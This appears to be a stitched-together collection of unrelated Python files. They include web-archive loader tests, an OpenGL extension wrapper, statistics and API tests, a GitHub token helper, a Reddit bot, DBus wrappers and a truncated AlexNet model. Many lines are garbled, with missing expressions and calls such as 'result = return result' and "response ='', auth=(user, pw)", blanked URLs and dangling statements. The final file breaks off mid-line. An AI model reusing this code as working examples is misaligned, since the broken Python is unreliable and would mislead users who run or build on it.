'foo=bar&dir=/baz' # unsupported method >>> extract_post_query('PUT', 'application/x-www-form-urlencoded', len(post_data), BytesIO(post_data)) # unsupported type >>> extract_post_query('POST', 'text/plain', len(post_data), BytesIO(post_data)) # invalid length >>> extract_post_query('POST', 'application/x-www-form-urlencoded', 'abc', BytesIO(post_data)) >>> extract_post_query('POST', 'application/x-www-form-urlencoded', 0, BytesIO(post_data)) # length too short >>> extract_post_query('POST', 'application/x-www-form-urlencoded', len(post_data) - 4, BytesIO(post_data)) 'foo=bar&dir=%2' # length too long >>> extract_post_query('POST', 'application/x-www-form-urlencoded', len(post_data) + 4, BytesIO(post_data)) 'foo=bar&dir=/baz' # test read_last_line >>> read_last_line(BytesIO('A\nB\nC')) 'C' >>> read_last_line(BytesIO('Some Line\nLonger Line\nLongest Last Line LL'), offset=8) 'Longest Last Line LL' >>> read_last_line(BytesIO('A\nBC')) 'BC' >>> read_last_line(BytesIO('A\nBC\n')) 'BC\n' >>> read_last_line(BytesIO('ABC')) 'ABC' """ #================================================================= import re import os import pytest from io import BytesIO from pywb.utils.loaders import BlockLoader, HMACCookieMaker, to_file_url from pywb.utils.loaders import LimitReader, extract_client_cookie, extract_post_query from pywb.utils.loaders import append_post_query, read_last_line from pywb.utils.bufferedreaders import DecompressingBufferedReader from pywb import get_test_dir test_cdx_dir = get_test_dir() + 'cdx/' def read_multiple(reader, inc_reads): result = None for x in inc_reads: result = return result def seek_read_full(seekable_reader, offset): seekable_reader.readline() #skip return seekable_reader.readline() def test_s3_read_1(): pytest.importorskip('boto') res = BlockLoader().load('s3://aws-publicdatasets/common-crawl/crawl-data/CC-MAIN-2015-11/segments/1424936462700.28/warc/CC-MAIN-20150226074102-00159-ip-10-28-5-156.ec2.internal.warc.gz', offset=53235662, length=2526) buff = assert len(buff) == 2526 reader = DecompressingBufferedReader(BytesIO(buff)) assert reader.readline() == 'WARC/1.0\r\n' assert reader.readline() == 'WARC-Type: response\r\n' if __name__ == "__main__": import doctest doctest.testmod()
'''OpenGL extension ARB.uniform_buffer_object This module customises the behaviour of the OpenGL.raw.GL.ARB.uniform_buffer_object to provide a more Python-friendly API Overview (from the spec) This extension introduces the concept of a group of GLSL uniforms known as a "uniform block", and the API mechanisms to store "uniform blocks" in GL buffer objects. The extension also defines both a standard cross-platform layout in memory for uniform block data, as well as mechanisms to allow the GL to optimize the data layout in an implementation-defined manner. Prior to this extension, the existing interface for modification of uniform values allowed modification of large numbers of values using glUniform* calls, but only for a single uniform name (or a uniform array) at a time. However, updating uniforms in this manner may not map well to heterogenous uniform data structures defined for a GL application and in these cases, the application is forced to either: A) restructure their uniform data definitions into arrays or B) make an excessive number of calls through the GL interface to one of the Uniform* variants. These solutions have their disadvantages. Solution A imposes considerable development overhead on the application developer. Solution B may impose considerable run-time overhead on the application if the number of uniforms modified in a given frame of rendering is sufficiently large. This extension provides a better alternative to either (A) or (B) by allowing buffer object backing for the storage associated with all uniforms of a given GLSL program. Storing uniform blocks in buffer objects enables several key use cases: - sharing of uniform data storage between program objects and between program stages - rapid swapping of sets of previously defined uniforms by storing sets of uniform data on the GL server - rapid updates of uniform data from both the client and the server The data storage for a uniform block can be declared to use one of three layouts in memory: packed, shared, or std140. - "packed" uniform blocks have an implementation-dependent data layout for efficiency, and unused uniforms may be eliminated by the compiler to save space. - "shared" uniform blocks, the default layout, have an implementation- dependent data layout for efficiency, but the layout will be uniquely determined by the structure of the block, allowing data storage to be shared across programs. - "std140" uniform blocks have a standard cross-platform cross-vendor layout (see below). Unused uniforms will not be eliminated. Any uniforms not declared in a named uniform block are said to be part of the "default uniform block". While uniforms in the default uniform block are updated with glUniform* entry points and can have static initializers, uniforms in named uniform blocks are not. Instead, uniform block data is updated using the routines that update buffer objects and can not use static initializers. Rules and Concepts Guiding this Specification: For reference, a uniform has a "uniform index" (subsequently referred to as "u_index) and also a "uniform location" to efficiently identify it in the uniform data store of the implementation. We subsequently refer to this uniform data store of the implementation as the "uniform database". A "uniform block" only has a "uniform block index" used for queries and connecting the "uniform block" to a buffer object. A "uniform block" has no "location" because "uniform blocks" are not updated directly. The buffer object APIs are used instead. Properties of Uniforms and uniform blocks: a) A uniform is "active" if it exists in the database and has a valid u_index. b) A "uniform block" is "active" if it exists in the database and has a valid ub_index. c) Uniforms and "uniform blocks" can be inactive because they don't exist in the source, or because they have been removed by dead code elimination. d) An inactive uniform has u_index == INVALID_INDEX. e) An inactive uniform block has ub_index == INVALID_INDEX. f) A u_index or ub_index of INVALID_INDEX generates the INVALID_VALUE error if given as a function argument. g) The default uniform block, which is not assigned any ub_index, uses a private, internal data storage, and does not have any buffer object associated with it. h) An active uniform that is a member of the default uniform block has location >= 0 and it has offset == stride == -1. i) An active uniform that is a member of a named uniform block has location == -1. j) A uniform location of -1 is silently ignored if given as a function argument. k) Uniform block declarations may not be nested The official definition of this extension is available here: ''' from OpenGL import platform, constants, constant, arrays from OpenGL import extensions, wrapper from OpenGL.GL import glget import ctypes from OpenGL.raw.GL.ARB.uniform_buffer_object import * ### END AUTOGENERATED SECTION
from chainer import distributions from chainer import testing import numpy @testing.parameterize(*testing.product({ 'shape': [(3, 2), (1,)], 'is_variable': [True, False], 'sample_shape': [(3, 2), ()], })) @testing.fix_random() @testing.with_requires('scipy') class TestNormal(testing.distribution_unittest): scipy_onebyone = True def setUp_configure(self): from scipy import stats self.dist = distributions.Normal self.scipy_dist = stats.norm self.test_targets = set([ "batch_shape", "cdf", "entropy", "event_shape", "icdf", "log_cdf", "log_prob", "log_survival", "mean", "prob", "sample", "stddev", "support", "survival", "variance"]) loc = numpy.random.uniform(-1, 1, self.shape).astype(numpy.float32) scale = numpy.exp( numpy.random.uniform(-1, 1, self.shape)).astype(numpy.float32) self.params = {"loc": loc, "scale": scale} self.scipy_params = {"loc": loc, "scale": scale} def sample_for_test(self): smp = numpy.random.normal( size=self.sample_shape + self.shape).astype(numpy.float32) return smp testing.run_module(__name__, __file__)
import github import getpass import json import keyring import subprocess import requests GITHUB_NEW_TOKEN_URI = '' fake_username = 'love tools' def get_auth_token(token): if token is not None: return token token = keyring.get_password('github', fake_username) if token is not None: return token print("Please enter your github username and password. These are not " "stored, only used to get an oAuth token. You can revoke this at " "any time on Github.") user = input("Username: ") pw = getpass.getpass("Password: ") auth_request = { "scopes": [ "public_repo", ], "note": "Love tools", "note_url": "", } response ='', auth=(user, pw), data=json.dumps(auth_request)) if response.status_code == 401 and response.headers.get('X-GitHub-OTP') == 'required; sms': print("Your login API resquest a SMS one time password") sms_pw = getpass.getpass("SMS password: ") response ='', auth=(user, pw), data=json.dumps(auth_request), headers={'X-GitHub-OTP':sms_pw}) response.raise_for_status() token = json.loads(response.text)['token'] keyring.set_password('github', fake_username, token) return token def setup_github_credentials(log): token = get_auth_token(None) gh = github.Github(token) user = gh.get_user()'Logged in on GitHub as %s ', return token, user def setup_github_repository(user, proposal, log): from github import UnknownObjectException try: repo = user.get_repo(proposal)'It appears like %s repository already exists, using it as remote', repr(proposal)) except UnknownObjectException: repo = user.create_repo(proposal) ssh_url = repo.ssh_url slug = repo.full_name'Working with repository %s', slug) # Clone github repo locally, over SSH an chdir into it"Cloning github repository locally")"Calling subprocess : %s", ' '.join(['git', 'clone' , ssh_url]))['git', 'clone' , ssh_url]) return slug
# -*- coding: utf-8 -*- # # Copyright (C) 2020 GNS3 Technologies Inc. # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <>. from gns3server.controller.drawing import Drawing async def test_create_drawing(controller_api, project): params = { "svg": '<svg height="210" width="500"><line x1="0" y1="0" x2="200" y2="200" style="stroke:rgb(255,0,0);stroke-width:2" /></svg>', "x": 10, "y": 20, "z": 0 } response = await"/projects/{}/drawings".format(, params) assert response.status == 201 assert response.json["drawing_id"] is not None async def test_get_drawing(controller_api, project): params = { "svg": '<svg height="210" width="500"><line x1="0" y1="0" x2="200" y2="200" style="stroke:rgb(255,0,0);stroke-width:2" /></svg>', "x": 10, "y": 20, "z": 0 } response = await"/projects/{}/drawings".format(, params) response = await controller_api.get("/projects/{}/drawings/{}".format(, response.json["drawing_id"])) assert response.status == 200 assert response.json["x"] == 10 async def test_update_drawing(controller_api, project): params = { "svg": '<svg height="210" width="500"><line x1="0" y1="0" x2="200" y2="200" style="stroke:rgb(255,0,0);stroke-width:2" /></svg>', "x": 10, "y": 20, "z": 0 } response = await"/projects/{}/drawings".format(, params) response = await controller_api.put("/projects/{}/drawings/{}".format(, response.json["drawing_id"]), {"x": 42}) assert response.status == 201 assert response.json["x"] == 42 async def test_list_drawing(controller_api, project): params = { "svg": '<svg height="210" width="500"><line x1="0" y1="0" x2="200" y2="200" style="stroke:rgb(255,0,0);stroke-width:2" /></svg>', "x": 10, "y": 20, "z": 0 } await"/projects/{}/drawings".format(, params) response = await controller_api.get("/projects/{}/drawings".format( assert response.status == 200 assert len(response.json) == 1 async def test_delete_drawing(controller_api, project): drawing = Drawing(project) project._drawings = { drawing} response = await controller_api.delete("/projects/{}/drawings/{}".format(, assert response.status == 204 assert not in project.drawings
# -*- coding: utf-8 -*- # (C) Datadog, Inc. 2018-present # All rights reserved # Licensed under a 3-clause BSD style license (see LICENSE) from decimal import ROUND_HALF_DOWN import mock import pytest from six import PY2, PY3 from datadog_checks.base.utils.common import ensure_bytes, ensure_unicode, pattern_filter, round_value, to_native_string from datadog_checks.base.utils.containers import hash_mutable, iter_unique from datadog_checks.base.utils.limiter import Limiter from datadog_checks.base.utils.secrets import SecretsSanitizer class Item: def __init__(self, name): = name def __eq__(self, other): return == class TestPatternFilter: def test_no_items(self): items = [] whitelist = ['mock'] assert pattern_filter(items, whitelist=whitelist) == [] def test_no_patterns(self): items = ['mock'] assert pattern_filter(items) is items def test_multiple_matches_whitelist(self): items = ['abc', 'def', 'abcdef', 'ghi'] whitelist = ['abc', 'def'] assert pattern_filter(items, whitelist=whitelist) == ['abc', 'def', 'abcdef'] def test_multiple_matches_blacklist(self): items = ['abc', 'def', 'abcdef', 'ghi'] blacklist = ['abc', 'def'] assert pattern_filter(items, blacklist=blacklist) == ['ghi'] def test_whitelist_blacklist(self): items = ['abc', 'def', 'abcdef', 'ghi'] whitelist = ['def'] blacklist = ['abc'] assert pattern_filter(items, whitelist=whitelist, blacklist=blacklist) == ['def'] def test_key_function(self): items = [Item('abc'), Item('def'), Item('abcdef'), Item('ghi')] whitelist = ['abc', 'def'] assert pattern_filter(items, whitelist=whitelist, key=lambda item: == [ Item('abc'), Item('def'), Item('abcdef'), ] class TestLimiter: def test_no_uid(self): warning = mock.MagicMock() limiter = Limiter("my_check", "names", 10, warning_func=warning) for _ in range(0, 10): assert limiter.is_reached() is False assert limiter.get_status() == (10, 10, False) # Reach limit assert limiter.is_reached() is True assert limiter.get_status() == (11, 10, True) # Make sure warning is only sent once assert limiter.is_reached() is True warning.assert_called_once_with("Check %s exceeded limit of %s %s, ignoring next ones", "my_check", 10, "names") def test_with_uid(self): warning = mock.MagicMock() limiter = Limiter("my_check", "names", 10, warning_func=warning) for _ in range(0, 20): assert limiter.is_reached("dummy1") is False assert limiter.get_status() == (1, 10, False) for _ in range(0, 20): assert limiter.is_reached("dummy2") is False assert limiter.get_status() == (2, 10, False) warning.assert_not_called() def test_mixed(self): limiter = Limiter("my_check", "names", 10) for _ in range(0, 20): assert limiter.is_reached("dummy1") is False assert limiter.get_status() == (1, 10, False) for _ in range(0, 5): assert limiter.is_reached() is False assert limiter.get_status() == (6, 10, False) def test_reset(self): limiter = Limiter("my_check", "names", 10) for _ in range(1, 20): limiter.is_reached("dummy1") assert limiter.get_status() == (1, 10, False) limiter.reset() assert limiter.get_status() == (0, 10, False) assert limiter.is_reached("dummy1") is False assert limiter.get_status() == (1, 10, False) class TestRounding: def test_round_half_up(self): assert round_value(3.5) == 4.0 def test_round_modify_method(self): assert round_value(3.5, rounding_method=ROUND_HALF_DOWN) == 3.0 def test_round_modify_sig_digits(self): assert round_value(2.555, precision=2) == 2.560 assert round_value(4.2345, precision=2) == 4.23 assert round_value(4.2345, precision=3) == 4.235 class TestContainers: def test_iter_unique(self): custom_queries = [ { 'metric_prefix': 'database', 'tags': ['test:database'], 'query': 'SELECT thing1, thing2 FROM TABLE', 'columns': [{'name': 'database.metric', 'type': 'count'}, {'name': 'tablespace', 'type': 'tag'}], }, { 'tags': ['test:database'], 'columns': [{'name': 'tablespace', 'type': 'tag'}, {'name': 'database.metric', 'type': 'count'}], 'query': 'SELECT thing1, thing2 FROM TABLE', 'metric_prefix': 'database', }, ] assert len(list(iter_unique(custom_queries))) == 1 @pytest.mark.parametrize( 'value', [ pytest.param({'x': 'y'}, id='dict'), pytest.param({'x': 'y', 'z': None}, id='dict-with-none-value'), pytest.param({'x': 'y', None: 't'}, id='dict-with-none-key'), pytest.param({'x': ['y', 'z'], 't': 'u'}, id='dict-nest-list'), pytest.param(['x', 'y'], id='list'), pytest.param(['x', None], id='list-with-none'), pytest.param(('x', None), id='tuple-with-none'), pytest.param({'x', None}, id='set-with-none'), ], ) def test_hash_mutable(self, value): h = hash_mutable(value) assert isinstance(h, int) @pytest.mark.skipif( PY2, reason="In Python 2, a < b when a and b are of different types returns `False` (does not raise `TypeError`)", ) @pytest.mark.parametrize( 'value', [ pytest.param(['x', 1], id='mixed-list'), pytest.param(['x', [1, 2, 3]], id='mixed-list-nested-1'), pytest.param(['x', {'y': 'z'}], id='mixed-list-nested-2'), pytest.param(('x', 1), id='mixed-tuple'), pytest.param({'x', 1}, id='mixed-set'), pytest.param({'x': 1, 2: 'y'}, id='mixed-dict-keys'), ], ) def test_hash_mutable_unsupported_mixed_type(self, value): """ Hashing mixed type containers is not supported, mostly because we haven't needed to add support for it yet. """ with pytest.raises(TypeError): hash_mutable(value) @pytest.mark.parametrize( 'left, right', [ pytest.param([1, 2], [2, 1], id='top-level'), pytest.param({'x': [1, 2]}, {'x': [2, 1]}, id='nested'), ], ) def test_hash_mutable_commutative(self, left, right): """ hash_mutable() is expected to return the same hash regardless of the order of items in the container. """ assert hash_mutable(left) == hash_mutable(right) class TestBytesUnicode: @pytest.mark.skipif(PY3, reason="Python 3 does not support explicit bytestring with special characters") def test_ensure_bytes_py2(self): assert ensure_bytes('éâû') == 'éâû' assert ensure_bytes(u'éâû') == 'éâû' def test_ensure_bytes(self): assert ensure_bytes('qwerty') == b'qwerty' def test_ensure_unicode(self): assert ensure_unicode('éâû') == u'éâû' assert ensure_unicode(u'éâû') == u'éâû' def test_to_native_string(self): # type: () -> None text = u'éâû' binary = text.encode('utf-8') if PY3: assert to_native_string(binary) == text else: assert to_native_string(binary) == binary class TestSecretsSanitizer: def test_default(self): # type: () -> None secret = 's3kr3t' sanitizer = SecretsSanitizer() assert sanitizer.sanitize(secret) == secret def test_sanitize(self): # type: () -> None secret = 's3kr3t' sanitizer = SecretsSanitizer() sanitizer.register(secret) assert all(letter == '*' for letter in sanitizer.sanitize(secret)) def test_sanitize_multiple(self): # type: () -> None pwd1 = 's3kr3t' pwd2 = 'admin123' sanitizer = SecretsSanitizer() sanitizer.register(pwd1) sanitizer.register(pwd2) message = 'Could not authenticate with password {}, did you try {}?'.format(pwd1, pwd2) sanitized = sanitizer.sanitize(message) assert pwd1 not in sanitized assert pwd2 not in sanitized
import datetime import config import random import string import os import gnupg textchars = bytearray({7,8,9,10,12,13,27} | set(range(0x20, 0x100)) - {0x7f}) is_binary_string = lambda bytes: bool(bytes.translate(None, textchars)) def log_to_stdout(message): time_now = str('.')[0] print('[{0}] {1}'.format(time_now, message)) def path_gen(slug): return config.store_dir + '/' + slug def slug_gen(size=6, chars=string.ascii_lowercase + string.digits): slug = ''.join(random.choice(chars) for _ in range(size)) if os.path.exists(path_gen(slug)): slug = slug_gen(6, chars) return slug def save_file(slug, string): with open(path_gen(slug), "wb") as out: out.write(string) def create_gpg(): gpghome = config.gpghome + '/' + slug_gen(4) os.makedirs(gpghome) open(gpghome + '/gpg.conf', 'a').close() os.chmod(gpghome + '/gpg.conf', 0o600) os.chmod(gpghome, 0o700) gpg = gnupg.GPG(gnupghome = gpghome) gpg.list_keys() return gpg, gpghome
# -*- coding: utf-8 -*- # Licensed under a 3-clause BSD style license - see LICENSE.rst from __future__ import (absolute_import, division, print_function, unicode_literals) import os import sys import pytest from asv.util import check_output, which from . import tools from .test_workflow import generate_basic_conf WIN = ( == 'nt') def test_find(capfd, tmpdir): values = [ (None, None), (1, 1), (3, 1), (None, 1), (6, None), (5, 1), (6, 1), (6, 1), (6, 6), (6, 6), ] tmpdir, local, conf, machine_file = generate_basic_conf(tmpdir, values=values, dummy_packages=False) # Test find at least runs tools.run_asv_with_conf(conf, 'find', "master~5..master", "params_examples.track_find_test", _machine_file=machine_file) # Check it found the first commit after the initially tested one output, err = capfd.readouterr() regression_hash = check_output( [which('git'), 'rev-parse', 'master^'], cwd=conf.repo) assert "Greatest regression found: {0}".format(regression_hash[:8]) in output @pytest.mark.flaky(reruns=1, reruns_delay=5) # depends on a timeout def test_find_timeout(capfd, tmpdir): values = [ (1, 0), (1, 0), (1, -1) ] tmpdir, local, conf, machine_file = generate_basic_conf(tmpdir, values=values, dummy_packages=False) # Test find at least runs tools.run_asv_with_conf(conf, 'find', "-e", "master", "params_examples.time_find_test_timeout", _machine_file=machine_file) # Check it found the first commit after the initially tested one output, err = capfd.readouterr() regression_hash = check_output( [which('git'), 'rev-parse', 'master'], cwd=conf.repo) assert "Greatest regression found: {0}".format(regression_hash[:8]) in output assert "asv: benchmark timed out (timeout 1.0s)" in output
#! /usr/bin/env python #-*- coding: utf-8 -*- # ***** BEGIN LICENSE BLOCK ***** # This file is part of Shelter Database. # Copyright (c) 2016 # All rights reserved. # # # # ***** END LICENSE BLOCK ***** from bootstrap import app, manager from web import models from web import processors # 'User' Web service blueprint_user = manager.create_api_blueprint(models.User, exclude_columns=['pwdhash'], methods=['GET', 'POST', 'PUT', 'DELETE'], preprocessors=dict( GET_SINGLE=[processors.auth_func], GET_MANY=[processors.auth_func], POST=[processors.auth_func, processors.shelter_POST_preprocessor], DELETE=[processors.auth_func])) # 'Shelter' Web service blueprint_shelter = manager.create_api_blueprint(models.Shelter, exclude_columns=['user_id', 'responsible.pwdhash', ''], methods=['GET', 'POST', 'PUT', 'DELETE'], preprocessors=dict( POST=[processors.auth_func, processors.shelter_POST_preprocessor], DELETE=[processors.auth_func])) # 'ShelterPicture' Web service blueprint_shelter_picture = manager.create_api_blueprint(models.ShelterPicture, methods=['GET', 'POST', 'PUT', 'DELETE']) # 'Section' Web service blueprint_section = manager.create_api_blueprint(models.Section, methods=['GET', 'POST', 'PUT', 'DELETE']) # 'Category' Web service blueprint_category = manager.create_api_blueprint(models.Category, methods=['GET', 'POST', 'PUT', 'DELETE']) # 'Attribute' Web service blueprint_attribute = manager.create_api_blueprint(models.Attribute, methods=['GET', 'POST', 'PUT', 'DELETE'], results_per_page = 10000000, max_results_per_page = 10000000) # 'AttributePicture' Web service blueprint_attribute_picture = manager.create_api_blueprint(models.AttributePicture, methods=['GET', 'POST', 'PUT', 'DELETE']) # 'Value' Web service blueprint_value = manager.create_api_blueprint(models.Value, methods=['GET', 'POST', 'PUT', 'DELETE'], preprocessors=dict( PUT_SINGLE=[processors.value_edit_preprocessor], PUT_MANY=[processors.value_edit_preprocessor] )) # 'Property' Web service blueprint_property = manager.create_api_blueprint(models.Property, methods=['GET', 'POST', 'PUT', 'PATCH', 'DELETE'], results_per_page = 10000000, max_results_per_page = 10000000, preprocessors=dict( POST=[processors.auth_func, processors.property_preprocessor], PUT=[processors.auth_func, processors.property_preprocessor], DELETE=[processors.auth_func])) # 'Page' Web service blueprint_page = manager.create_api_blueprint(models.Page, methods=['GET', 'POST', 'PUT', 'PATCH', 'DELETE']) # 'Translation' Web service blueprint_translation = manager.create_api_blueprint(models.Translation, methods=['GET', 'POST', 'PUT', 'PATCH', 'DELETE'])
import praw import OAuth2Util import requests import re import time from bs4 import BeautifulSoup STORE_LINK = "" SUBREDDIT = "" SLEEP = 60 BOT_BY = """------ ^Bot ^by ^[/u/iammrinal0](/user/iammrinal0)""" def get_url(app_name): set_of_links = "" ctrl = 0 heads = {"User-Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0)" " Gecko/20100101 Firefox/36.0"} results = requests.get(STORE_LINK, params={"q": app_name}, headers=heads) soup = BeautifulSoup(results.content, "html.parser") for tag in soup.find_all("a", {"data-os": True}): if tag["data-os"] == "app": if tag.string is not None: univ_url = universal_url(tag["href"]) publisher = get_publisher(univ_url) possible = "Possible matches for *{0}*:\n\n".format(app_name) if publisher: if app_name.lower() == tag.string.lower(): set_of_links += prepare_comment( tag.string, univ_url, publisher) break else: if ctrl == 0: set_of_links += possible set_of_links += prepare_comment( tag.string, univ_url, publisher, True) ctrl += 1 if ctrl == 3: break if not set_of_links: set_of_links = "This app was not found: *{0}*\n\n".format(app_name) return set_of_links def prepare_comment(app_name, app_url, app_dev, possible=None): tabs = "" if possible: tabs = "* " return "{0}[{1}]({2}) by {3}\n\n".format(tabs, app_name, app_url, app_dev) def get_publisher(app_url): heads = {"User-Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0)" " Gecko/20100101 Firefox/36.0"} results = requests.get(app_url, headers=heads) soup = BeautifulSoup(results.content, "html.parser") publisher = soup.find("div", {"class": "content m-b-n clamp-5"} ) if publisher: return publisher.text.strip() def universal_url(url): return "{0}s?appid={1}".format(url[:28], url[-36:]) def replied_file(comm_id): with open("comments.txt", "a") as f: f.write("\n") f.write("\n".join(comm_id)) def post_comment(comment, reply, comment_submission): if comment_submission: comment.reply(reply) else: comment.add_comment(reply) return def get_app_name(stri): trigger = "\w*wpapp\[([^]]*)\]" exp = re.compile(trigger, re.I) found = exp.findall(stri) if found: return found def bot_process(text, comment_submission, replied_id): comment_id = [] if comment_submission: data = text.body else: data = text.selftext trigger_found = get_app_name(data) if trigger_found and not str( in replied_id: app_names = [] for apps in trigger_found: if any("," in s for s in apps): name = apps.split(",") for app_split in name: app_names.append(app_split.strip().lower()) else: app_names.append(apps.strip().lower()) url = "" for name in app_names: url += get_url(name) if url: print("commenting...") done_id = post_comment(text, url + BOT_BY, comment_submission) comment_id.append(str(done_id)) return comment_id def main(): with open("comments.txt", "r") as f: replied_id = r = praw.Reddit(user_agent="WP Store Linker v0.1 by /u/iammrinal0") OAuth2Util.OAuth2Util(r) sub = r.get_subreddit(SUBREDDIT) print("Starting Bot...") while True: sub.refresh() comment_id = [] for comment in sub.get_comments(): cmnt_id = bot_process(comment, True, replied_id) if cmnt_id: comment_id.extend(cmnt_id) if comment_id: print("Writing to file...") replied_file(comment_id) replied_id.extend(comment_id) print("Done! Now sleeping for {0}s".format(SLEEP)) time.sleep(SLEEP) comment_id = [] for submn in sub.get_new(): cmnt_id = bot_process(submn, False, replied_id) if cmnt_id: comment_id.extend(cmnt_id) if comment_id: print("Writing to file...") replied_file(comment_id) replied_id.extend(comment_id) print("Done! Now sleeping for {0}s".format(SLEEP)) time.sleep(SLEEP) replied_file(comment_id) if __name__ == "__main__": main()
#!/usr/bin/env python # Copyright (C) 2009 Martin Vidner # # # Authors: # Martin Vidner <martin at> # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2, or (at your option) # any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 # USA "Convenience wrappers around dbus-python" import dbus import functools # TODO rename to adaptors from func import Adaptor, MethodAdaptor, PropertyAdaptor, SignalAdaptor def object_path(o): """Return the object path of o. If o is a proxy object, use its appropriate attribute. Otherwise assume that o already is an object path. """ if isinstance(o, dbus.proxies.ProxyObject): return o.object_path # hope it is ok return o class DBusMio(dbus.proxies.ProxyObject): """Multi-interface object. Will look into introspection data to find which interface to use for a method or a property, obviating the need for dbus.proxies.Interface. If introspection is not available, provide default_interface to the constructor. BUGS: 1st method call will block with introspection""" def __init__(self, conn=None, bus_name=None, object_path=None, introspect=True, follow_name_owner_changes=False, **kwargs): """Constructor. kwargs may contain default_interface, to be used if introspection does not provide it for a method/property """ self.__default_interface = kwargs.pop("default_interface", None) super(DBusMio, self).__init__(conn, bus_name, object_path, introspect, follow_name_owner_changes, **kwargs) def set_base_iface(self, iface): self.__base_interface = iface def __getattr__(self, name): """Proxied DBus methods. Uses introspection or default_interface to find the interface. """ # TODO cache # iface = self._interface_cache.get(name) # if iface == None: iface = self.__default_interface # _introspect_method_map comes from ProxyObject # But it will be empty until the async introspection finishes self._introspect_block() # FIXME makeit work with async methods methods = self._introspect_method_map.keys() for im in methods: (i, m) = im.rsplit(".", 1) if m == name: iface = i # print "METHOD %s INTERFACE %s" %(name, iface) callable = super(DBusMio, self).__getattr__(name) return functools.partial(callable, dbus_interface=iface, byte_arrays=True) # properties def __getitem__(self, key): """Proxies DBus properties as dictionary items. a = DBusMio(...) p = a["Prop"] Uses default_interface (because dbus.proxies.ProxyObject does not store introspection data for properties, boo. TODO.) """ iface = self.__default_interface # TODO cache base_iface = self.__base_interface # TODO _introspect_property_map pmi = dbus.Interface(self, "org.freedesktop.DBus.Properties") try: return pmi.Get(iface, key, byte_arrays=True) except dbus.exceptions.DBusException, e: if "AccessDenied" in e.get_dbus_name(): return pmi.Get(base_iface, key, byte_arrays=True) def __setitem__(self, key, value): """Proxies DBus properties as dictionary items. a = DBusMio(...) a["Prop"] = "Hello" Uses default_interface (because dbus.proxies.ProxyObject does not store introspection data for properties, boo. TODO.) """ iface = self.__default_interface # TODO cache # TODO _introspect_property_map pmi = dbus.Interface(self, "org.freedesktop.DBus.Properties") pmi_res = pmi.Set(iface, key, value, byte_arrays=True) if not pmi_res: return pmi.Set(base_iface, key, value, byte_arrays=True) def _mklist(x): """Return a list. Tuples are made into lists, everything else a singleton list. """ if isinstance(x, list): return x elif isinstance(x, tuple): return [i for i in x] else: return [x] class DBusClient(DBusMio): """ """ _adaptors = { "methods": {}, "signals": {}, "properties": {}, } def set_base_iface(self, iface): super(DBusClient, self).set_base_iface(iface) @classmethod def _get_adaptor(cls, kind, name): # print "GET", cls, kind, name try: a = cls._adaptors[kind][name] # print ">", a # TODO cache somehow? return a except KeyError: scls = cls.__mro__[1] # can use "super"? how? try: return scls._get_adaptor(kind, name) except AttributeError: # no _get_adaptor there raise KeyError(":".join((kind, name))) @classmethod def _add_adaptor(cls, kind, name, adaptor): # print "ADD", cls, kind, name, adaptor assert(isinstance(adaptor, Adaptor)) cls._adaptors[kind][name] = adaptor @classmethod def _add_adaptors_dict(cls, andict): """ a nested dictionary of kind:name:adaptor, """ if not cls.__dict__.has_key("_adaptors"): # do not use inherited attribute cls._adaptors = {"methods":{}, "properties":{}, "signals":{}} for section in cls._adaptors.keys(): secsource = andict.pop(section, {}) for name, adaptor in secsource.iteritems(): cls._add_adaptor(section, name, adaptor) assert len(andict) == 0 # print "AA", cls, cls._adaptors @classmethod def _add_adaptors(cls, **kwargs): """kwargs: a *flat* dictionary of name: adaptor""" adict = {"methods":{}, "properties":{}, "signals":{}} for k, v in kwargs.iteritems(): kind = v.kind() adict[kind][k] = v cls._add_adaptors_dict(adict) def __getattr__(self, name): "Wrap return values" callable = super(DBusClient, self).__getattr__(name) try: adaptor = self._get_adaptor("methods", name) return adaptor.adapt(callable) except KeyError: return callable # properties def __getitem__(self, key): value = super(DBusClient, self).__getitem__(key) try: adaptor = self._get_adaptor("properties", key) return adaptor.adapt(value) except KeyError: return value def __setitem__(self, key, value): try: adaptor = self._get_adaptor("properties", key) value = adaptor.adapt_write(value) except KeyError: pass return super(DBusClient, self).__setitem__(key, value) # signals # overrides a ProxyObject method def _connect_to_signal(self, signame, handler, interface=None, **kwargs): "Wrap signal handler, with arg adaptors" # TODO also demarshal kwargs adaptor = self._get_adaptor("signals", signame) wrap_handler = adaptor.adapt(handler) return self.connect_to_signal(signame, wrap_handler, interface, **kwargs)
"""This is an TensorFLow implementation of AlexNet by Alex Krizhevsky at all. Paper: ( @original author: Frederik Kratzert (contact: f.kratzert(at) """ import tensorflow as tf import numpy as np class AlexNet(object): """Implementation of the AlexNet.""" def __init__(self, x, keep_prob, num_classes, skip_layer, weights_path='DEFAULT'): """Create the graph of the AlexNet model. Args: x: Placeholder for the input tensor. keep_prob: Dropout probability. num_classes: Number of classes in the dataset. skip_layer: List of names of the layer, that get trained from scratch weights_path: Complete path to the pretrained weight file, if it isn't in the same folder as this code """ # Parse input arguments into class variables self.X = x self.NUM_CLASSES = num_classes self.KEEP_PROB = keep_prob self.SKIP_LAYER = skip_layer if weights_path == 'DEFAULT': self.WEIGHTS_PATH = 'bvlc_alexnet.npy' else: self.WEIGHTS_PATH = weights_path # Call the create function to build the computational graph of AlexNet self.create() def create(self): """Create the network graph.""" # 1st Layer: Conv (w ReLu) -> Lrn -> Pool conv1 = conv(self.X, 11, 11, 96, 4, 4, padding='VALID', name='conv1') norm1 = lrn(conv1, 2, 2e-05, 0.75, name='norm1') pool1 = max_pool(norm1, 3, 3, 2, 2, padding='VALID', name='pool1') # 2nd Layer: Conv (w ReLu) -> Lrn -> Pool with 2 groups conv2 = conv(pool1, 5, 5, 256, 1, 1, groups=2, name='conv2') norm2 = 